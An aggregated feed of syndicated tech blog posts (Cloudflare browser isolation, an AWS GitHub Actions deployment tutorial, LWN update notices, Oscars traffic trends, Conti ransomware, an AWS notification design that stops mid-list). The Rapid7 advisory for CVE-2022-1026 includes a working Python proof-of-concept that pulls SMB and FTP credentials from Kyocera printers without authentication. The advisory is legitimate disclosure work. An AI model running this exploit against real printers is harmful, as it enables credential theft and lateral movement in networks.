CVE-2022-1096: How Cloudflare Zero Trust provides protection from zero day browser vulnerabilities

Post Syndicated from Tim Obezuk original https://blog.cloudflare.com/cve-2022-1096-zero-trust-protection-from-zero-day-browser-vulnerabilities/

On Friday, March 25, 2022, Google published an emergency security update for all Chromium-based web browsers to patch a high severity vulnerability (CVE-2022-1096). At the time of writing, the specifics of the vulnerability are restricted until the majority of users have patched their local browsers.

It is important that everyone take a moment to update their local web browser. It’s one quick and easy action everyone can take to contribute to the cybersecurity posture of their team.

Even if everyone updated their browser straight away, this remains a reactive measure to a threat that existed before the update was available. Let’s explore how Cloudflare takes a proactive approach by mitigating the impact of zero day browser threats with our zero trust and remote browser isolation services. Cloudflare’s remote browser isolation service is built from the ground up to protect against zero day threats, and all remote browsers on our global network have already been patched.

How Cloudflare Zero Trust protects against browser zero day threats

Cloudflare Zero Trust applies a layered defense strategy to protect users from zero day threats while browsing the Internet:

  1. Cloudflare’s roaming client steers Internet traffic over an encrypted tunnel to a nearby Cloudflare data center for inspection and filtering.
  2. Cloudflare’s secure web gateway inspects and filters traffic based on our network intelligence, antivirus scanning and threat feeds. Requests to known malicious services are blocked and high risk or unknown traffic is automatically served by a remote browser.
  3. Cloudflare’s browser isolation service executes all website code in a remote browser to protect unpatched devices from threats inside the unknown website.

Protection from the unknown

Zero day threats are often exploited undetected in the wild, actively targeting users through risky links in emails or other external communication points such as customer support tickets. This risk cannot be eliminated, but it can be reduced by using remote browser isolation to minimize the attack surface. Cloudflare’s browser isolation service is built from the ground up to protect against zero day threats:

  • Prevent compromised web pages from affecting the endpoint device by executing all web code in a remote browser that is physically isolated from the endpoint device. The endpoint device only receives a thin HTML5 remoting shell from our network and vector draw commands from the remote browser.
  • Mitigate the impact of compromise by automatically destroying and reconstructing remote browsers back to a known clean state at the end of their browser session.
  • Protect adjacent remote browsers by encrypting all remote browser egress traffic, segmenting remote browsers with virtualization technologies and distributing browsers across physical hardware in our global network.
  • Aid Security Incident Response (SIRT) teams by logging all remote egress traffic in the integrated secure web gateway logs.

Patching remote browsers around the world

Even with all these security controls in place, patching browsers remains critical to eliminate the risk of compromise. The processes of patching local and remote browsers tell two different stories, and the difference between them can determine whether a zero day vulnerability is avoided or exploited.

Patching your workforce’s local browsers requires politely asking users to interrupt their work to update their browser, or applying mobile device management techniques to disrupt their work by forcing an update. Neither of these options creates happy users or delivers rapid mitigation.

Patching remote browsers is a fundamentally different process. Since the remote browser itself is running on our network, users and administrators do not need to intervene: security patches are automatically deployed to remote browsers on Cloudflare’s network. Then, without the user restarting their local browser, any traffic to an isolated website is automatically served from a patched remote browser.

Finally, browser-based vulnerabilities such as CVE-2022-1096 are not uncommon. With over 300 in 2021 and over 40 already in 2022 (according to cvedetails.com), it is critical for administrators to have a plan to rapidly mitigate and patch browsers in their organization.

Get started with Cloudflare Browser Isolation

Cloudflare Browser Isolation is available to both self-serve and enterprise customers. Whether you’re a small startup or a massive enterprise, our network is ready to serve fast and secure remote browsing for your team, no matter where they are based.

To get started, visit our website and, if you’re interested in evaluating Browser Isolation, ask our team for a demo of Clientless Web Isolation.

Integrating with GitHub Actions – CI/CD pipeline to deploy a Web App to Amazon EC2

Post Syndicated from Mahesh Biradar original https://aws.amazon.com/blogs/devops/integrating-with-github-actions-ci-cd-pipeline-to-deploy-a-web-app-to-amazon-ec2/

Many organizations adopt DevOps practices to innovate faster by automating and streamlining the software development and infrastructure management processes. Beyond cultural adoption, DevOps also suggests following certain best practices, and Continuous Integration and Continuous Delivery (CI/CD) is among the most important ones to start with. CI/CD practice reduces the time it takes to release new software updates by automating deployment activities. Many tools are available to implement this practice. Although AWS has a set of native tools to help achieve your CI/CD goals, it also offers flexibility and extensibility for integrating with numerous third-party tools.

In this post, you will use GitHub Actions to create a CI/CD workflow and AWS CodeDeploy to deploy a sample Java SpringBoot application to Amazon Elastic Compute Cloud (Amazon EC2) instances in an Auto Scaling group.

GitHub Actions is a feature on GitHub’s popular development platform that helps you automate your software development workflows in the same place that you store code and collaborate on pull requests and issues. You can write individual tasks called actions, and then combine them to create a custom workflow. Workflows are custom automated processes that you can set up in your repository to build, test, package, release, or deploy any code project on GitHub.

AWS CodeDeploy is a deployment service that automates application deployments to Amazon EC2 instances, on-premises instances, serverless AWS Lambda functions, or Amazon Elastic Container Service (Amazon ECS) services.

Solution Overview

The solution utilizes the following services:

  1. GitHub Actions – Workflow orchestration tool that will host the pipeline.
  2. AWS CodeDeploy – AWS service to manage deployments to the Amazon EC2 Auto Scaling group.
  3. AWS Auto Scaling – AWS service that helps maintain application availability and elasticity by automatically adding or removing Amazon EC2 instances.
  4. Amazon EC2 – Destination compute server for the application deployment.
  5. AWS CloudFormation – AWS infrastructure as code (IaC) service used to spin up the initial infrastructure on the AWS side.
  6. IAM OIDC identity provider – Federated authentication service that establishes trust between GitHub and AWS, allowing GitHub Actions to deploy on AWS without maintaining AWS secrets and credentials.
  7. Amazon Simple Storage Service (Amazon S3) – Amazon S3 to store the deployment artifacts.

The following diagram illustrates the architecture for the solution:

Architecture Diagram

  1. Developer commits code changes from their local repo to the GitHub repository. In this post, the GitHub action is triggered manually, but this can be automated.
  2. GitHub action triggers the build stage.
  3. GitHub’s OpenID Connect (OIDC) provider issues tokens used to authenticate to AWS and access resources.
  4. GitHub action uploads the deployment artifacts to Amazon S3.
  5. GitHub action invokes CodeDeploy.
  6. CodeDeploy triggers the deployment to Amazon EC2 instances in an Auto Scaling group.
  7. CodeDeploy downloads the artifacts from Amazon S3 and deploys to Amazon EC2 instances.

Prerequisites

Before you begin, you must complete the following prerequisites:

  • An AWS account with permissions to create the necessary resources.
  • A GitHub account with permissions to configure GitHub repositories, create workflows, and configure GitHub secrets.
  • A Git client to clone the provided source code.

Steps

The following steps provide a high-level overview of the walkthrough:

  1. Clone the project from the AWS code samples repository.
  2. Deploy the AWS CloudFormation template to create the required services.
  3. Update the source code.
  4. Setup GitHub secrets.
  5. Integrate CodeDeploy with GitHub.
  6. Trigger the GitHub Action to build and deploy the code.
  7. Verify the deployment.

Download the source code

  1. Clone the source code repository aws-codedeploy-github-actions-deployment.

git clone https://github.com/aws-samples/aws-codedeploy-github-actions-deployment.git

  2. Create an empty repository in your personal GitHub account. To create a GitHub repository, see Create a repo. Clone this repo to your computer. Ignore the warning about cloning an empty repository.

git clone https://github.com/<username>/<repoName>.git

Figure2: Github Clone

  3. Copy the code. You need the contents of the hidden .github folder for the GitHub Actions to work.

cp -r aws-codedeploy-github-actions-deployment/. <new repository>

e.g. GitActionsDeploytoAWS

  4. Now you should have the following folder structure in your local repository.

Figure3: Directory Structure

Repository folder structure

  • The .github folder contains actions defined in the YAML file.
  • The aws/scripts folder contains code to run at the different deployment lifecycle events.
  • The cloudformation folder contains the template.yaml file to create the required AWS resources.
  • The spring-boot-hello-world-example folder contains a sample application used by GitHub Actions to build and deploy.
  • The root of the repo contains appspec.yml. This file is required by CodeDeploy to perform the deployment on Amazon EC2. Find more details here.

The following commands will help make sure that your remote repository points to your personal GitHub repository.

git remote remove origin

git remote add origin <your repository url>

git branch -M main

git push -u origin main

Deploy the CloudFormation template

To deploy the CloudFormation template, complete the following steps:

  1. Open the AWS CloudFormation console. Sign in with your account ID, user name, and password.
  2. Check your region, as this solution uses us-east-1.
  3. If this is a new AWS CloudFormation account, select Create New Stack. Otherwise, select Create Stack.
  4. Select Template is Ready
  5. Select Upload a template file
  6. Select Choose File. Navigate to the template.yaml file in your cloned repository at “aws-codedeploy-github-actions-deployment/cloudformation/template.yaml”.
  7. Select the template.yaml file, and select Next.
  8. In Specify Stack Details, add or modify the values as needed.
    • Stack name = CodeDeployStack.
    • VPC and Subnets = (pre-populated for you; you can change these values if you prefer to use your own subnets)
    • GitHubThumbprintList = 6938fd4d98bab03faadb97b34396831e3780aea1
    • GitHubRepoName – Name of your GitHub personal repository which you created.

Figure4: CloudFormation Parameters

  9. On the Options page, select Next.
  10. Select the acknowledgement box to allow for the creation of IAM resources, and then select Create. It will take CloudFormation approximately 10 minutes to create all of the resources. This stack creates the following resources:
    • Two Amazon EC2 Linux instances with the Tomcat server and CodeDeploy agent installed
    • An Auto Scaling group with an internet-facing Application Load Balancer
    • CodeDeploy application name and deployment group
    • Amazon S3 bucket to store build artifacts
    • Identity and Access Management (IAM) OIDC identity provider
    • Instance profile for Amazon EC2
    • Service role for CodeDeploy
    • Security groups for ALB and Amazon EC2

Update the source code

  1. On the AWS CloudFormation console, select the Outputs tab. Note the Amazon S3 bucket name and the ARN of the GitHub IAM role. We will use these in the next step.

Figure5: CloudFormation Output

  2. Update the Amazon S3 bucket in the workflow file deploy.yml. Navigate to /.github/workflows/deploy.yml from your project root directory.

Replace ##s3-bucket## with the name of the Amazon S3 bucket created previously.

Replace ##region## with your AWS Region.

Figure6: Actions YML

  3. Update the Amazon S3 bucket name in after-install.sh. Navigate to aws/scripts/after-install.sh. This script copies the deployment artifact from the Amazon S3 bucket to the Tomcat webapps folder.

Figure7: CodeDeploy Instruction

Remember to save all of the files and push the code to your GitHub repo.

  4. Verify that you’re in your git repository folder by running the following command:

git remote -v

You should see your remote branch address, which is similar to the following:

username@3c22fb075f8a GitActionsDeploytoAWS % git remote -v

origin [email protected]:<username>/GitActionsDeploytoAWS.git (fetch)

origin [email protected]:<username>/GitActionsDeploytoAWS.git (push)

  5. Now run the following commands to push your changes:

git add .

git commit -m "Initial commit"

git push

Setup GitHub Secrets

The GitHub Actions workflows must access resources in your AWS account. Here we are using an IAM OpenID Connect (OIDC) identity provider and an IAM role with IAM policies to access CodeDeploy and the Amazon S3 bucket. OIDC lets your GitHub Actions workflows access resources in AWS without needing to store the AWS credentials as long-lived GitHub secrets.
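Under the hood, the workflow’s short-lived OIDC token is exchanged for temporary AWS credentials through AWS STS. In the workflow itself, the aws-actions/configure-aws-credentials action performs this exchange for you; the sketch below only illustrates the mechanism, and the role ARN and token shown are placeholders:

import boto3

def credentials_from_oidc_token(role_arn: str, oidc_token: str) -> dict:
    """Trade a GitHub-issued OIDC token for temporary AWS credentials."""
    sts = boto3.client("sts")
    response = sts.assume_role_with_web_identity(
        RoleArn=role_arn,                       # e.g. the GitHubIAMRole ARN from the stack outputs
        RoleSessionName="github-actions-deploy",
        WebIdentityToken=oidc_token,            # JWT issued by GitHub's OIDC provider
        DurationSeconds=3600,
    )
    return response["Credentials"]              # AccessKeyId, SecretAccessKey, SessionToken

Because these credentials expire after the session duration, there is nothing long-lived to leak from the repository.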

With OIDC, only the IAM role’s ARN needs to be stored as a GitHub secret within your GitHub repository, under Settings > Secrets. For more information, see “GitHub Actions secrets”.

  • Navigate to your GitHub repository and select the Settings tab.
  • Select Secrets on the left menu bar, then select Actions under Secrets.
  • Select New repository secret.
    • Enter the secret name as ‘IAMROLE_GITHUB’.
    • Enter the value as the ARN of GitHubIAMRole, which you copied from the CloudFormation output section.

Figure8: Adding Github Secrets

Figure9: Adding New Secret

Integrate CodeDeploy with GitHub

For CodeDeploy to be able to perform deployment steps using scripts in your repository, it must be integrated with GitHub.

The CodeDeploy application and deployment group have already been created for you. Use these names in the next step:

CodeDeploy application = CodeDeployAppNameWithASG

Deployment group = CodeDeployGroupName

To link a GitHub account to an application in CodeDeploy, follow the instructions on this page up to step 10.

You can cancel the process after completing step 10. You don’t need to create a deployment.

Trigger the GitHub Actions Workflow

Now you have created the required AWS resources and configured GitHub to build and deploy the code to Amazon EC2 instances.

The GitHub Actions workflow defined in GITHUBREPO/.github/workflows/deploy.yml lets us run the pipeline. The workflow is currently set up to be run manually.

Follow these steps to run it manually:

Go to your GitHub repo and select the Actions tab.

Figure10: See Actions Tab

Select the Build and Deploy link, and select Run workflow as shown in the following image.

Figure11: Running Workflow Manually

After a few seconds, the workflow will be displayed. Then, select Build and Deploy.

Figure12: Observing Workflow

You will see two stages:

  1. Build and Package.
  2. Deploy.

Build and Package

The Build and Package stage builds the sample SpringBoot application, generates the war file, and then uploads it to the Amazon S3 bucket.

Figure13: Completed Workflow

You should be able to see the war file in the Amazon S3 bucket.

Figure14: Artifacts saved in S3

Deploy

In this stage, the workflow invokes the CodeDeploy service and triggers the deployment.

Figure15: Deploy With Actions

Verify the deployment

Log in to the AWS Console and navigate to the CodeDeploy console.

Select the Application name and deployment group. You will see the status as Succeeded if the deployment is successful.

Figure16: Verifying Deployment

Point your browser to the URL of the Application Load Balancer.

Note: You can get the URL from the output section of the CloudFormation stack or from the Amazon EC2 console under Load Balancers.

Figure17: Verifying Application

Optional – Automate the deployment on Git Push

The workflow can be automated by changing the following lines of code in your .github/workflows/deploy.yml file.

From

workflow_dispatch: {}

To


  #workflow_dispatch: {}
  push:
    branches: [ main ]
  pull_request:

This will be interpreted by GitHub Actions to automatically run the workflow on every push or pull request to the main branch.

After testing end-to-end flow manually, you can enable the automated deployment.

Clean up

To avoid incurring future charges, you should clean up the resources that you created.

  1. Empty the Amazon S3 bucket.
  2. Delete the CloudFormation stack (CodeDeployStack) from the AWS console.
  3. Delete the GitHub Secret (‘IAMROLE_GITHUB’)
    1. Go to your repository settings on the GitHub page.
    2. Select Actions under Secrets.
    3. Select IAMROLE_GITHUB, and delete it.

Conclusion

In this post, you saw how to leverage GitHub Actions and CodeDeploy to securely deploy a Java SpringBoot application to Amazon EC2 instances in an Auto Scaling group. You can further add other stages to your pipeline, such as testing and security scanning.

Additionally, this solution can be used for other programming languages.

About the Authors

Mahesh Biradar is a Solutions Architect at AWS. He is a DevOps enthusiast and enjoys helping customers implement cost-effective architectures that scale.
Suresh Moolya is a Cloud Application Architect with Amazon Web Services. He works with customers to architect, design, and automate business software at scale on AWS cloud.

Security updates for Tuesday

Post Syndicated from original https://lwn.net/Articles/889571/

Security updates have been issued by Debian (libdatetime-timezone-perl, pjproject, and tzdata), Mageia (chromium-browser-stable, docker, graphicsmagick, and libtiff), Oracle (expat), Red Hat (expat, httpd:2.4, openssl, and screen), Scientific Linux (expat and openssl), and Ubuntu (libtasn1-6, linux-oem-5.14, openjdk-lts, and paramiko).

CVE-2022-1026: Kyocera Net View Address Book Exposure

Post Syndicated from Tod Beardsley original https://blog.rapid7.com/2022/03/29/cve-2022-1026-kyocera-net-view-address-book-exposure/

Rapid7 researcher Aaron Herndon has discovered that several models of Kyocera multifunction printers running vulnerable versions of Net View unintentionally expose sensitive user information, including usernames and passwords, through an insufficiently protected address book export function. This vulnerability is an instance of CWE-522: Insufficiently Protected Credentials, and has an estimated base CVSS 3.1 score of 8.6, given that the credentials exposed are used to authenticate to other endpoints, such as external FTP and SMB servers.

Product description

Many Kyocera multifunction printers (MFPs) can be administered using Net Viewer. Two such supported and tested models of MFPs are the ECOSYS M2640idw and the TASKalfa 406ci. These printers can be routinely found in both home office and enterprise environments around the world.

Credit

This issue, CVE-2022-1026, was discovered by security researcher Aaron Herndon of Rapid7. It is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Exploitation

Kyocera exposes a SOAP API on port 9091/TCP used for remote printer management via the Net Viewer thick client application. While the API supports authentication, and the thick client performs this authentication, capturing the SOAP requests revealed that the specific request to extract an address book, `POST /ws/km-wsdl/setting/address_book`, does not require an authenticated session to submit. Those address books, in turn, contain stored email addresses, usernames, and passwords, which are normally used to store scanned documents on external services or send them to users over email.

Exploitation details

In order to exploit the vulnerability, an attacker need only be on a network that can reach the MFP’s listening SOAP service on port 9091/TCP. The attack begins by submitting an unauthenticated SOAP request to that service, `POST /ws/km-wsdl/setting/address_book`, with the XML body shown in the proof of concept below.

This instructs the printer to prepare an address book object for download containing all sensitive data configured in the address book. The printer responds with an address book enumeration object number, which is ‘5’ in this instance.

Once that object number is received, an attacker can populate the “<ns1:enumeration>” value with that number in a SOAP request with the wsa:Action get_personal_address_list, using the same POST endpoint.

This returns the printer address book, in fairly readable XML, with all configured email addresses, FTP credentials, and network SMB file share credentials stored for user scanning to network shares.

Finally, credentials can be harvested from the provided login_password fields.

Exploit proof of concept

A proof-of-concept (PoC) Python exploit is shown below. Note the time.sleep(5) call, which allows the printer time to first generate the address book.

PoC Python code:

"""
Kyocera printer exploit
Extracts sensitive data stored in the printer address book, unauthenticated, including:
    *email addresses
    *SMB file share credentials used to write scan jobs to a network fileshare
    *FTP credentials
 
Author: Aaron Herndon, @ac3lives (Rapid7)
Date: 11/12/2021
Tested versions:
    * ECOSYS M2640idw
    * TASKalfa 406ci
 
Usage: 
python3 getKyoceraCreds.py printerip
"""
 
import requests
import xmltodict
import warnings
import sys
import time
warnings.filterwarnings("ignore")
 
url = "https://{}:9091/ws/km-wsdl/setting/address_book".format(sys.argv[1])
headers = {'content-type': 'application/soap+xml'}
# Submit an unauthenticated request to tell the printer that a new address book object creation is required
body = """<?xml version="1.0" encoding="utf-8"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://www.w3.org/2003/05/soap-envelope" xmlns:SOAP-ENC="http://www.w3.org/2003/05/soap-encoding" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xop="http://www.w3.org/2004/08/xop/include" xmlns:ns1="http://www.kyoceramita.com/ws/km-wsdl/setting/address_book"><SOAP-ENV:Header><wsa:Action SOAP-ENV:mustUnderstand="true">http://www.kyoceramita.com/ws/km-wsdl/setting/address_book/create_personal_address_enumeration</wsa:Action></SOAP-ENV:Header><SOAP-ENV:Body><ns1:create_personal_address_enumerationRequest><ns1:number>25</ns1:number></ns1:create_personal_address_enumerationRequest></SOAP-ENV:Body></SOAP-ENV:Envelope>"""
 
response = requests.post(url,data=body,headers=headers, verify=False)
strResponse = response.content.decode('utf-8')
#print(strResponse)
 
 
parsed = xmltodict.parse(strResponse)
# The SOAP request returns XML with an object ID as an integer stored in kmaddrbook:enumeration. We need this object ID to request the data from the printer.
getNumber = parsed['SOAP-ENV:Envelope']['SOAP-ENV:Body']['kmaddrbook:create_personal_address_enumerationResponse']['kmaddrbook:enumeration']
 
body = """<?xml version="1.0" encoding="utf-8"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://www.w3.org/2003/05/soap-envelope" xmlns:SOAP-ENC="http://www.w3.org/2003/05/soap-encoding" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xop="http://www.w3.org/2004/08/xop/include" xmlns:ns1="http://www.kyoceramita.com/ws/km-wsdl/setting/address_book"><SOAP-ENV:Header><wsa:Action SOAP-ENV:mustUnderstand="true">http://www.kyoceramita.com/ws/km-wsdl/setting/address_book/get_personal_address_list</wsa:Action></SOAP-ENV:Header><SOAP-ENV:Body><ns1:get_personal_address_listRequest><ns1:enumeration>{}</ns1:enumeration></ns1:get_personal_address_listRequest></SOAP-ENV:Body></SOAP-ENV:Envelope>""".format(getNumber)
 
print("Obtained address book object: {}. Waiting for book to populate".format(getNumber))
time.sleep(5)
print("Submitting request to retrieve the address book object...")
 
 
response = requests.post(url,data=body,headers=headers, verify=False)
strResponse = response.content.decode('utf-8')
#print(strResponse)
 
parsed = xmltodict.parse(strResponse)
print(parsed['SOAP-ENV:Envelope']['SOAP-ENV:Body'])
 
print("\n\nObtained address book. Review the above response for credentials in objects such as 'login_password', 'login_name'")

Impact

The most likely attack scenario involving this vulnerability would be an attacker who is already inside the LAN perimeter leveraging their ability to communicate directly with affected printers to learn the usernames and passwords for the stored SMB and FTP file servers. In the case of SMB credentials, those might then be leveraged to establish a presence in the target network’s Windows domain.

Depending on how those external services are administered, the attacker may also be able to collect prior (and future) print/scan jobs originating from the targeted printer, but the primary value of this vulnerability is lateral movement within the network. Note that printer credentials are not themselves at risk (except in the case of reused passwords, of course), but credentials to the services where the printer is normally expected to store scanned documents are exposed via this vulnerability.

Remediation

First and foremost, MFPs should under no circumstances be reachable directly across the internet. While this is true for most LAN-centric technologies, it is especially true for printers and scanners, which are popular targets for opportunistic attackers. These devices tend to only support weak authentication mechanisms, even in the best of cases, and are rarely kept up to date with firmware updates that address security issues. So, as long as only trusted users can reach these networked printers, the opportunity for attack is limited to insiders and attackers who have otherwise managed to establish a local network presence.

At the time of this disclosure, there is no patch or updated firmware available for affected devices. The version information displayed on a vulnerable ECOSYS M2640idw device lists three versions, and we believe the proper version number for this software is the middle version listed, “2S0_1000.005.0012S5_2000.002.505.”

In light of the lack of patching, Kyocera customers are advised to disable the SOAP interface running on port 9091/TCP of affected MFPs. Details on precisely how to disable this service can be found in the documentation relevant to the specific MFP model. If SOAP access is required over the network for normal operation, users should ensure that address books do not contain sensitive, unchanging passwords.

One possible configuration that would make this vulnerability moot would be to only allow public, anonymous FTP or SMB write access (but not read access) for scanned document storage, and another process to move those documents securely across the network to their final destination. The exposure of email addresses would remain, but this is of considerably less value to most attackers.

Disclosure timeline

  • Nov 2021: Issue identified by Aaron Herndon of Rapid7
  • Tue Nov 16, 2021: Contacted Kyocera’s primary support and other-support
  • Fri Nov 19, 2021: Opened case number: CS211119002 with Kyocera support
  • Mon Nov 22, 2021: Released details to the vendor
  • Fri Jan 7, 2022: Opened JPCERT/CC case number JVNVU#96890480
    • Discovered a more reliable security-specific contact at Kyocera
  • Wed Jan 19, 2022: Extended disclosure deadline to mid-March, 2022
  • Jan-Mar 2022: Communication about workarounds and other mitigations
  • Fri Mar 18, 2022: CVE-2022-1026 reserved
  • Tue Mar 29, 2022: Public disclosure (this document)


How the Oscars impacted the Internet (at least in the US)

Post Syndicated from João Tomé original https://blog.cloudflare.com/oscars-2022-impact/

The 94th Academy Awards happened this past Sunday, March 27, 2022. The global event saw Oscars awarded to winners like CODA, Jane Campion (the director of The Power of the Dog), and Dune (which won six Oscars), but also moments that had a clear impact on Internet traffic, like the altercation on stage between Will Smith and Chris Rock.

Cloudflare Radar uses a variety of sources to provide aggregate information about Internet traffic and attack trends. In this blog post, we will use DNS name resolution data as a proxy for traffic to Internet services, as we did for the Super Bowl LVI.

The baseline value for the charts (which focus only on the US) was calculated by taking the mean DNS traffic level for the associated Internet services between 08:00 – 12:00 PST on Sunday (March 27, 2022) — usually we use UTC, but we chose Los Angeles time as that’s where the event took place.
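As a rough illustration of the method (this is not Cloudflare’s actual pipeline, just the arithmetic behind the percentages quoted below; the sample counts are made up):

from statistics import mean

def percent_change_vs_baseline(samples: dict[str, int], baseline_window: list[str]) -> dict[str, float]:
    """samples maps 'HH:MM' -> DNS request count; baseline_window lists the baseline timestamps."""
    baseline = mean(samples[t] for t in baseline_window)
    return {t: (count / baseline - 1) * 100 for t, count in samples.items()}

changes = percent_change_vs_baseline(
    {"08:00": 100, "10:00": 104, "12:00": 96, "19:25": 132},  # illustrative counts
    baseline_window=["08:00", "10:00", "12:00"],
)
print(round(changes["19:25"], 1))  # -> 32.0, i.e. 32% above the morning baseline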

The event started with Beyoncé singing at 17:00 PST and ended at around 20:30. The start of the show didn’t bring much traffic growth for social media, although TikTok and Twitter started to decrease in DNS requests after that time.

Will Smith makes Twitter and TikTok rise in requests

Twitter and TikTok were the social networks that seemed most impacted by the moment Will Smith went on stage and started an altercation with Chris Rock after a joke.

For Twitter, the major change in DNS requests was exactly after that incident (at 19:25); before that, at 18:00, the moment Sebastián Yatra performed Encanto’s Dos Oruguitas song also had a small spike.

There were 32% more DNS requests for Twitter a few minutes after the altercation, and that growth peaked at 20:15 with 51% more requests than there were at 19:20 — that was after Will Smith (20:05) gave his acceptance and apology speech, when he was awarded the Best Actor Oscar. The ceremony ended at 20:30, and after that traffic went down.

TikTok also seemed to be used during the ceremony and the breaks, and saw a spike during one of the commercial breaks, around 18:40, after Troy Kotsur won the Best Supporting Actor Oscar for his role in CODA.

The Will Smith incident seems to be associated with an increase of 20% in requests from 19:20 to 19:30. The trend continued with a 25% increase (19:40) and a peak of 40% more traffic at 20:15, right after Will Smith’s speech. After the ceremony ended (20:30), traffic went down.

Facebook (yellow line) and Instagram (green) weren’t particularly impacted, although there was a decrease in traffic after the ceremony started, with requests falling off after 19:00, especially for Facebook.

Actresses made IMDb.com tick

One of the main sources of information about the movie industry is IMDb.com, the Internet Movie Database, and traffic to the site was impacted by the Oscars in a way not related to the Will Smith incident. Requests almost doubled (93% increase) in the minutes before the Oscars started (between 16:50 and 17:00).

And there was another clear spike right after Ariana DeBose won (at 17:23) the Best Supporting Actress Oscar for West Side Story, with almost 90% growth in traffic compared to the previous 10 minutes.

There was also an increase at 19:00, when Kenneth Branagh won the Best Original Screenplay Oscar for writing Belfast. The other major spike in traffic, a 55% increase compared to the previous minutes, was right around the time Jessica Chastain got the Oscar for Best Actress for her role in the movie The Eyes of Tammy Faye.

ABC was the official broadcaster for the 2022 Oscars, and throughout the event had good numbers: two hours before the ceremony, ABC.com and their dedicated page Oscars.com (which redirects to abc.com/shows/oscars) had between 200% and 600% more traffic than in our baseline (the morning period, 08:00 – 12:00 PST).

The biggest spike was around 19:45, a few minutes after the Will Smith incident. This was around the time Questlove received the Best Documentary Oscar for Summer of Soul (…Or, When the Revolution Could Not Be Televised), and there was a reunion for The Godfather, with Francis Ford Coppola and actors Al Pacino and Robert De Niro, on stage.

Oscars official website

The official Oscars.org website also had some trends worth mentioning. Requests to the site increased 400% in the hour before the ceremony started, from 16:00 to 17:00, and remained high after that.

But at 19:45 there was a clearer spike in traffic, around a 1,300% increase compared to the previous 10 minutes — that was 20 minutes after the Will Smith incident, right after Questlove’s Oscar and at the time of The Godfather reunion. There was another spike right after the Best Actress award and before the event ended. The full list of winners was published on Oscars.org right after 20:30.

So, how about the trends for movie news sites like Variety, Hollywood Reporter, Vulture, or E! Online? For this we looked at the whole Oscars week (the baseline is a mean of the previous Sunday, March 20, 2022). Oscars Sunday, March 27, was definitely the main day of the week, with DNS requests for those websites growing 833% more than on the best days of the previous week.

That growth was even higher the next day, Monday, March 28, 2022, when traffic rose to 1,200% more than the best days of the previous week.

Conclusion

As we saw with Super Bowl LVI, an out of the ordinary moment in a popular event, even one broadcast via television, causes changes in social media and Internet traffic. In the case of Super Bowl LVI it was the Coinbase ad; here it was an unexpected incident on stage.

Other trends like these can be found on the Cloudflare Radar website or via our dedicated Twitter account.

A Detailed Look at the Conti Ransomware Gang

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/03/a-detailed-look-at-the-conti-ransomware-gang.html

Based on two years of leaked messages, 60,000 in all:

The Conti ransomware gang runs like any number of businesses around the world. It has multiple departments, from HR and administrators to coders and researchers. It has policies on how its hackers should process their code, and shares best practices to keep the group’s members hidden from law enforcement.

Build a multi-language notification system with Amazon Translate and Amazon Pinpoint

Post Syndicated from Praveen Allam original https://aws.amazon.com/blogs/architecture/build-a-multi-language-notification-system-with-amazon-translate-and-amazon-pinpoint/

Organizations with global operations can struggle to notify their customers of any business-related announcements or notifications in different languages. Their customers want to receive notifications in their local language and through their preferred communication channel. Organizations often rely on complicated third-party services or individuals to manually translate the notifications. This can lead to a loss of revenue due to delayed communication and additional operational expenses.

This blog post demonstrates how to build a straightforward, cost-effective, and scalable multi-language notification system using AWS Serverless technologies. You can post a business-related announcement or notification in English, and based on the customer profile data, it will convert this announcement or notification into different languages. Additionally, the system will also deliver these translated announcements or notifications as an email, voice, or SMS.

Example of a multi-language notification use case

A restaurant franchise company is adding a new item to their menu and plans to release it in North America, Germany, and France. The corporate office has decided to send the following notification.

The company is adding a new item to the menu, and this will go live by May 10. Please ensure you are prepared for this change and plan accordingly.

The franchise owners in Germany want to receive the notifications in the German language, whereas the franchise owners in France want to receive it in French. North American franchises want to receive it in English.

Solution design for multi-language notification system

The solution in Figure 1 demonstrates how to build a multi-language notification system using Amazon Translate and Amazon Pinpoint.

AWS Serverless technologies handle automatic scaling, have a built-in high availability architecture, and offer a pay-for-use billing model, which increases agility and optimizes costs. The system built with this solution is invoked using REST API endpoints. Once this solution is deployed, it can be integrated with any frontend application where users can log in and send out notification events.

Figure 1 illustrates the architecture of this solution.

Figure 1. Solution architecture for multi-language notification system

1. The restaurant franchise will log in to their UI to type the notification message in English. Upon submission, the notification message is sent to the Amazon API Gateway REST endpoint.
Note: In this solution, there is no UI available. You will use a terminal to submit the message.

2. Amazon API Gateway will send this message to Amazon Simple Queue Service (SQS), which will keep the HTTP requests asynchronous.

3. The SQS queue will invoke the SQS AWS Lambda function.

4. The SQS Lambda function invokes the AWS Step Functions state machine. This SQS Lambda function is used as a proxy mechanism to start the state machine workflow. AWS Step Functions is used to orchestrate the notification workflow process. The workflow process validates the message, converts it into different languages, and notifies the customers in their preferred way of communication (email, voice, or SMS). It also handles errors if any of the steps fail by using an SQS dead-letter queue.

5. The message entered must be validated in order to ensure that organizational standards are followed. To perform the message validation, we use the Amazon Comprehend service. Comprehend’s sentiment analysis determines whether to send or flag the message; all flagged messages are sent for review. A minimal sketch of this check follows the list below.

  • For the example use case message above, the message’s neutral sentiment score is 0.85 confidence. If you set the acceptable score to anything greater than 0.5 confidence, then it is a valid message. Once it passes the validation step, the workflow proceeds to the next step.
  • If the message is vague or unclear, the sentiment score might be less than 0.5 confidence. For example, with the message We are adding a dish; be ready for it, the sentiment score might be only 0.45 confidence. This is under the acceptable score, and the message will not be processed further.
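A minimal sketch of this validation step, assuming boto3 and the 0.5 neutral-score threshold described above (the threshold and the flagging behavior are illustrative, not the exact code in the repository):

import boto3

comprehend = boto3.client("comprehend")

def validate_message(message: str, threshold: float = 0.5) -> bool:
    """Return True if the message's neutral sentiment score clears the threshold."""
    result = comprehend.detect_sentiment(Text=message, LanguageCode="en")
    neutral_score = result["SentimentScore"]["Neutral"]
    return neutral_score > threshold  # below the threshold -> flag the message for review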

